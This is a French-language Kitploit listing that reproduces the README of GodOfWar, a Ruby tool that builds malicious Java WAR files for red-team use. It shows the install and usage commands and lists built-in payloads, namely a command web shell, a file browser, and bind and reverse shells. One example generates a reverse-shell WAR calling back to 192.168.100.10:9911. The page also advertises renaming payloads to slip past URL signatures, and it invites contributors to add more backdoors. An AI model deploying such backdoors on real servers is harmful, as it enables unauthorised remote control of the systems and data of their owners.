Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
godofwar — GodOfWar - Constructeur de fichiers WAR Java malveillant avec charges utiles intégrées | Kitploit
Outils/GitHubGitHub/kingsabri/godofwar
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubkingsabri/godofwar

godofwar

GodOfWar - Constructeur de fichiers WAR Java malveillant avec charges utiles intégrées

Voir le dépôt
12534il y a 7 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

GodOfWar - Générateur de WAR Java malveillant

Un outil en ligne de commande pour générer des charges utiles (payloads) WAR à des fins de tests d'intrusion / red team, écrit en Ruby.

root@kitploit:~
                              .
                             hhh              
                            hhhhhhh           
                           hhhhhhhh        
                          hhhhhhhh+        
                         hhhhhhhh'           
                        hhhhhhhh.            
                       hhhhhhhhh             
        ..--          hhhhhhhhh             
      -sh/..  +.     hhhhhhhhh:              
      /+/:-/+ss-`   hhhhhhhhhh:               
      /MMM`ss:``.`  hhhhhhhhhh:              
     .MMMMM:        hhhhhhhhhhhhhhhhh:       
     MMMMMMM:        hhhhhhhhhhhhhhhh:      
     MMMMMMMMMMMMM:  hhhhhhhhhhhhhhhh`       
    :NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`       
   ./:`smdo+oos++-    `++sNMMMMMNmh+         
      .-y-`     ` :.  /   -dmddhhhhh-        
       o/-     `//o/ /M/   `+hhhhhhhh`       
      /o     :yosmy   +y  .`.hhhhhhhho       
      +`     /../.:      `.y::hhhhhs:`       
       `      `+yys`   .sy` /oohhy:          
                `/:s/-``     `.hh`           
               ..`     `       y+            
            .hNNmmNdymmmmds`   :-            
            hs.   ``..    :y-  `             
               -hhmNmddm+   .                
               `NMMMMMMm                     
                ` `oMMy                      
            `.     /Md-      :o  
           MMMMMMMMMMMMMMMMMMM:             
            MMMMMMMMMMMMMMMMMM:              
             MMMMMMMMMMMMMMMMM               
              MMMMMMMMMMMMMMM.               
              `MMMMMMMMMMMMM.                 
                :sNMMMNMdo:                  
                  ``+m:/-                    
                     `                                  
GodOfWar - Générateur de WAR Java malveillant.

Fonctionnalités

  • Charges utiles préexistantes. (essayez -l/--list)
    • cmd_get
    • filebrowser
    • bind_shell
    • reverse_shell
    • reverse_shell_ui
  • Porte dérobée configurable. (essayez --host/--port)
  • Contrôle du nom de la charge utile.
    • Pour éviter un nom malveillant après le déploiement et contourner les signatures d'URL basées sur le nom.

Installation

root@kitploit:~
$ gem install godofwar

Utilisation

root@kitploit:~
$ godofwar -h 

Menu d'aide :
   -p, --payload PAYLOAD            Génère un WAR à partir de l'une des charges utiles disponibles.
                                        (consultez -l/--list)
   -H, --host IP_ADDR               Adresse IP locale ou distante pour la charge utile choisie
                                        (utilisé avec -p/--payload)
   -P, --port PORT                  Port local ou distant pour la charge utile choisie
                                        (utilisé avec -p/--payload)
   -o, --output [FICHIER]           Fichier de sortie et nom de déploiement.
                                        (par défaut, le nom original de la charge utile. consultez '-l/--list')
   -l, --list                       Liste toutes les charges utiles disponibles.
   -h, --help                       Affiche ce message d'aide.

Exemple

Lister toutes les charges utiles

root@kitploit:~
$ godofwar -l
├── cmd_get
│   └── Informations :
│       ├── Description : Exécution de commandes via interface web
│       ├── OS :          quelconque
│       ├── Paramètres :  {"false"=>"Aucun paramètre requis !"}
│       ├── Utilisation : http://host/cmd.jsp?cmd=whoami
│       ├── Références : ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│       └── Chemin local : /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│   └── Informations :
│       ├── Description : Navigateur de fichiers distant, téléchargement, upload, décompression de fichiers et exécution de commandes natives
│       ├── OS :          quelconque
│       ├── Paramètres :  {"false"=>"Aucun paramètre requis !"}
│       ├── Utilisation : http://host/filebrowser.jsp
│       ├── Références : ["http://www.vonloesch.de/filebrowser.html"]
│       └── Chemin local : /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│   └── Informations :
│       ├── Description : Shell TCP lié (bind shell)
│       ├── OS :          quelconque
│       ├── Paramètres :  {"port"=>4444, "false"=>"Aucun paramètre requis !"}
│       ├── Utilisation : http://host/reverse-shell.jsp
│       ├── Références : ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│       └── Chemin local : /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│   └── Informations :
│       ├── Description : Shell inverse TCP avec un formulaire HTML pour définir LHOST et LPORT depuis le navigateur.
│       ├── OS :          quelconque
│       ├── Paramètres :  {"host"=>"attacker", "port"=>4444, "false"=>"Aucun paramètre requis !"}
│       ├── Utilisation : http://host/reverse_shell_ui.jsp
│       ├── Références : []
│       └── Chemin local : /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│   └── Informations :
│       ├── Description : Shell inverse TCP. LHOST et LPORT sont codés en dur
│       ├── OS :          quelconque
│       ├── Paramètres :  {"host"=>"attacker", "port"=>4444, "false"=>"Aucun paramètre requis !"}
│       ├── Utilisation : http://host/reverse_shell.jsp
│       ├── Références : []
│       └── Chemin local : /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell

Générer une charge utile avec LHOST et LPORT

root@kitploit:~
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy

Après déploiement, vous pouvez accéder à votre shell sur (http://host:8080/puppy/puppy.jsp)

Contribuer

  1. Forkez le projet ( https://github.com/KINGSABRI/godofwar/fork ).
  2. Créez votre branche de fonctionnalité (git checkout -b my-new-feature).
  3. Commitez vos modifications (git commit -am 'Add some feature').
  4. Pushez sur la branche (git push origin my-new-feature).
  5. Créez une nouvelle Pull Request.

Ajouter d'autres portes dérobées

Pour contribuer en ajoutant d'autres portes dérobées :

  1. créez un nouveau dossier dans le répertoire payloads.
  2. placez votre fichier jsp dans le dossier nouvellement créé (nommez-le du même nom que le dossier).
  3. mettez à jour le fichier payloads_info.json avec :
    1. la description.
    2. le système d'exploitation supporté (essayez de le rendre universel néanmoins).
    3. les configurations : hôte et port par défaut.
    4. les références : l'origine de la charge utile ou les crédits de son créateur.

Licence

La gemme est disponible en open source selon les termes de la licence MIT.

Télécharger l’outil